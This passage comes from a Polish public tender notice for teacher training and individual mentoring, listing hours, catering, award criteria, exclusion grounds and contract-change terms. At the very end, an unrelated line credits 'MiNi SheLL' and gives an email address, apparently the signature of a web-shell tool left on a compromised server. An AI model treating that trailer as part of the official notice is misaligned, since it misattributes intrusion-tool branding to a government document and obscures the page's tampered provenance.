według następującego schematu:<br/>2025 r. - 45 godzin dydaktycznych zajęć dla jednej grupy (30 godz. dyd. w terminie od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 30.06.2025 r., 15 godz. dyd. w terminie 15.09.2025 r. – 20.12.2025 r.),<br/>2026 r. – 15 godzin dydaktycznych zajęć dla jednej grupy w terminie 02.01.2026 r. – 26.06.2026 r. <br/>1.7. Łączny czas trwania usługi łącznie 60 godzin dydaktycznych (8 dni) x 7 grup nauczycieli = 420 godziny dydaktycznych (56 dni).<br/>1.8. Uczestnikom zostaną zapewnione również materiały pomocnicze.<br/>1.9. Wykonawca zapewni ciepły posiłek (obiad dwudaniowy) wraz z przerwą kawową w dni realizacji wsparcia w formie stacjonarnej. Do kalkulacji należy przyjąć:<br/>a)	224 ciepłe posiłki (obiady dwudaniowe) = 56 nauczycieli x 4 dni. Obiad dla każdego uczestnika składać się będzie z dwóch dań: zupy oraz drugiego dania, które może być mięsne i/lub bezmięsne – zgodnie z preferencjami i ustaleniami dokonanymi z Zamawiającym na etapie realizacji usługi. Menu serwowanych dań nie może się powtarzać. Każdy posiłek winien być przygotowywany z wysokiej jakości składników, a następnie zapakowany w szczelne, termiczne opakowania, które zapewnią jego świeżość i odpowiednią temperaturę aż do momentu spożycia. Zamawiający zapewnia dedykowane pomieszczenie, w którym uczestnicy będą mogli skonsumować posiłek w dogodnych warunkach.<br/>b)	224 przerwy kawowe = 56 nauczycieli x 4 dni. W skład przerwy kawowej wchodzi: kawa rozpuszczalna i mielona, herbata, woda mineralna gazowana i/lub niegazowana 0,5l/osoba, mleko/mleczko do kawy, cukier, cytryna, drobne słone lub słodkie przekąski typu paluszki lub kruche ciastka dla każdego uczestnika.<br/>1.10. Realizacja zadania od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 26.06.2026 r. z tym, że:<br/>a)	Edycja wiosna 2025 od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 27.06.2025 r.<br/>b)	Edycja jesień 2025/wiosna 2026 od dnia 01.09.2025 r. do dnia 26.06.2026 r.<br/>1.11. Zakres usługi 420 godzin dydaktycznych.<br/><br/>2. Moduł 2: Indywidualne doskonalenie nauczycieli<br/>2.1. Usługa realizowana jest w jednostce miary – godzina zegarowa (60 minut).<br/>2.2. Uczestnikami zajęć jest łącznie 56 nauczycieli.<br/>2.3. Usługa będzie prowadzana w formie superwizji, mentoringu, ementoringu, wsparcia merytorycznego , doradztwo lub konsultacje indywidualne dla nauczycieli zgodnie z potrzebami. w zakresie odnoszącym się do kwestii problematycznych lub niezrozumiałych z tematyki realizowanej w ramach modułu: Kompetencje kluczowe jako fundament efektywnego nauczania oraz innych specyficznych problemów, na które natrafia lub doświadcza nauczyciel, w tym wsparcie psychologiczno-pedagogiczne m.in. przeciwdziałające wypaleniu zawodowemu.<br/>2.4. Zalecane 2 dyżury specjalistów po 6 godz. w tygodniu, minimum 2 specjalistów jednocześnie termin do ustalenia z zamawiającym, w szczególnych przypadkach, możliwe soboty.<br/>2.5. Forma przeprowadzonych usług – wsparcie indywidualne.<br/>2.6. Czas trwania wsparcia indywidualnego dla jednego nauczyciela – 12 godzin zegarowych.<br/>2.7. Łączny czas trwania usługi 12 godzin zegarowych x 56 nauczycieli = 672 godzin zegarowe.<br/>2.8. Realizacja zadania od dnia zawarcia umowy w sprawie zamówienia publicznego do dnia 26.06.2026 r. <br/>2.9. Zakres usługi 672 godziny zegarowe.<br/><br/>3. Szczegółowy opis przedmiotu zamówienia określa:<br/> 1) Szczegółowy Opis Przedmiotu Zamówienia (SOPZ) wraz z załącznikiem <br/>2) projektowane postanowienia umowy w sprawie zamówienia publicznego<br/>- stanowiące załączniki dla SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">80510000-2 - Usługi szkolenia specjalistycznego</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2026-06-26</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">50</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie kluczowego personelu</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny zatrudnieniowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 8</p> <p class="mb-0">Art. 109 ust. 1 pkt 10</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający nie wymaga żadnych podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Zamawiający nie wymaga żadnych podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia żadnych przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia musi złożyć dokumenty i Oświadczenia wskazane w sekcji V pkt 5.5 Ogłoszenia. Pozostałe<br/>dokumenty będą traktowane jako wspólne.<br/>2. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia muszą stanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy. Do OFERTY należy dołączyć stosowne pełnomocnictwo.<br/>3. Wykonawcy ubiegający się wspólnie o udzielenie zamówienia ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zamówienia, określoną w art. 366 Kodeksu cywilnego.<br/>4. Wszelka korespondencja będzie prowadzona wyłącznie z pełnomocnikiem.<br/>5. W formularzu OFERTA w miejscu „nazwa i adres wykonawcy” należy wpisać dane dotyczące wszystkich podmiotów wspólnie ubiegających się o udzielenie zamówienie, a nie tylko pełnomocnika.<br/>6. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych wykonawców wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań.<br/>7. Przed podpisaniem umowy od Wykonawców ubiegających się wspólnie o zamówienie publiczne, których oferta została wybrana Zamawiający będzie żądać umowy regulującej ich współpracę. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Możliwość zmiany zawartej umowy oraz warunki takich zmian zostały określone w §7 projektowanych postanowień umowy:<br/>1. Zamawiający zastrzega możliwość zmiany Umowy w następującym zakresie:<br/>1) terminu realizacji Umowy wynikającym ze zmiany harmonogramu realizacji projektu lub przedłużającej się procedury wyboru Wykonawcy w postępowaniu lub przedłużającej się procedury podpisywania Umowy; <br/>2) w związku ze zmianą umowy o dofinasowanie projektu, w ramach którego realizowany jest Przedmiot Umowy, gdy zmiana polegać będzie na dostosowaniu treści Umowy do warunków wynikających ze zmiany umowy o dofinansowanie;<br/>3) w związku ze zmianą powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu Umowy, gdzie zmiana będzie polegać na dostosowaniu treści Umowy do zmienionych przepisów prawa, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>4) gdy zaistnieją nowe, szczególne okoliczności, niezależne od Zamawiającego i Wykonawcy, uzasadniające zmiany terminu realizacji umowy, przy czym zmiana terminu może być dokonana tylko w zakresie wynikającym z tych okoliczności, bez wpływu na wysokość wynagrodzenia Wykonawcy;<br/>5) gdy zaistnieje siła wyższa mająca wpływ na realizację umowy, przy czym za siłę wyższą (w szczególności: powódź, pożar i inne klęski żywiołowe, pandemie i epidemie, zamieszki, strajki, ataki terrorystyczne, działania wojenne, nagłe załamania warunków atmosferycznych, nagłe przerwy w dostawie energii elektrycznej, promieniowanie lub skażenia itp.), gdzie zmiana będzie polegać będzie na dostosowaniu treści umowy celem uchylenia negatywnych skutków siły wyżej na realizację Przedmiotu Umowy,<br/>2. Każda ze Stron uprawniona jest do żądania zmiany wysokości wynagrodzenia (cen jednostkowych i cen ryczałtowych, o których mowa w § 5 ust. 1-3), w następujących przypadkach i na następujących zasadach:<br/>1) Zmiana wysokości wynagrodzenia dokonywana będzie w przypadku, gdy wartość wzrostu / spadku wskaźnika cen towarów i usług konsumpcyjnych, ogłaszanego w informacji/komunikacie Prezesa Głównego Urzędu Statystycznego wyniesie najmniej 5 % w stosunku miesiąca danego roku do tego samego miesiąca w roku poprzednim i wartość ta (wzrostu / spadku) utrzyma się przez co najmniej 3 kolejne miesiące.<br/>2) Zmiana wynagrodzenia następować będzie nie częściej niż dwa razy do roku, i nie wcześniej niż po upływie 3 miesięcy realizacji Umowy. Zmiana wynagrodzenia nie może przekroczyć 20 % wynagrodzenia Wykonawcy wskazanego w § 5 ust. 1 Umowy.<br/>3) Strona zainteresowana zmianą wysokości wynagrodzenia należnego Wykonawcy, zobowiązana jest do złożenia drugiej Stronie wniosku o dokonanie zmiany wynagrodzenia, wraz z analizą wpływu zmiany cen materiałów i kosztów związanych z realizacją przedmiotu umowy na całkowity koszt jej realizacji oraz dokumentami potwierdzającymi zasadność wniosku. <br/>4) Zmiana wynagrodzenia obowiązywać będzie od pierwszego dnia miesiąca następującego po miesiącu, w którym Strona złożyła wniosek o dokonanie zmiany wynagrodzenia.<br/>5) Jeżeli umowa została zawarta po upływie 180 dni od dnia upływu terminu składania ofert, postanowienia ust. 2 stosuje się odpowiednio, z zastrzeżeniem art. 439 ust. 3 ustawy Pzp.<br/>3. Wykonawca, którego wynagrodzenie zostało zmienione zgodnie z ust. 2 zobowiązany jest do zmiany wynagrodzenia przysługującego podwykonawcy, z którym zawarł umowę, w zakresie odpowiadającym zmianom cen materiałów lub kosztów dotyczących zobowiązania podwykonawcy, jeżeli łącznie spełnione są następujące warunki :<br/>1) przedmiotem umowy są roboty budowlane, dostawy lub usługi,<br/>2) okres obowiązywania umowy przekracza 6 miesięcy.<br/>Z uwagi na limit znaków pozostałe informacje zawarte są w §7 projektowanych postanowień umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">obejmujące, zgodnie z art. 96 ustawy: - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-25 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć na Platformie e-zamówienia. Wykonawca składa ofertę za pośrednictwem zakładki &#34;Oferty/wnioski&#34;, widocznej w podglądzie postępowania po zalogowaniu się na konto Wykonawcy.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-25 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-04-23</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: </h3> <p class="mb-0">Część 1 : <span class="normal">Tak</span></p> <p class="mb-0">Część 2 : <span class="normal">Tak</span></p> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Zamawiający nie wymaga złożenia oświadczenia o spełnieniu warunków udziału w postępowaniu.<br/>2. Dot. pkt 1.2. Sekcji I &#34;Zamawiający&#34; - dane dotyczą podmiotu prowadzącego postępowanie tj. Gmina Miasto Rzeszów -<br/>Urząd Miasta Rzeszowa, a nie Zamawiającego na rzecz którego jest prowadzone postepowanie tj. Biura Gospodarki<br/>Mieniem Miasta Rzeszowa.<br/>3. Zamawiający doprecyzowuje, że przedmiot zamówienia należy wykonać w terminie: <br/>Część 1 Moduł 1 i 2 oraz Część 2 Moduł 1 - Edycja wiosna 2025 od dnia zawarcia umowy do dnia 27.06.2025 r. Edycja jesień 2025/wiosna 2026 od dnia 01.09.2025 r. do dnia 26.06.2026 r.<br/>Część 2 Moduł 2 - od dnia zawarcia umowy do dnia 26.06.2026 r.<br/>4. Zamawiający wykluczy wykonawcę na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego w przypadku wystąpienia którejkolwiek z określonych w niej przesłanek. W celu potwierdzenia braku podstaw do wykluczenia na podstawie w/w przesłanki Zamawiający wymaga złożenia oświadczenia o niepodleganiu wykluczeniu potwierdzające brak podstaw wykluczenia na dzień składania ofert w zakresie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego – zawarte w formularzu OFERTA. W przypadku składania oferty wspólnej przez kilku wykonawców, każdy z wykonawców wspólnie ubiegających się o udzielenie zamówienia składa powyższe oświadczenie.<br/>5. c.d. do Sekcji III pkt 3.6. Ogłoszenia:<br/>10. Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>11. Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>12. Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>13. Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>Z uwagi na limit znaków szczegółowe informacje zawarte są w Rozdziale VIII i X SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com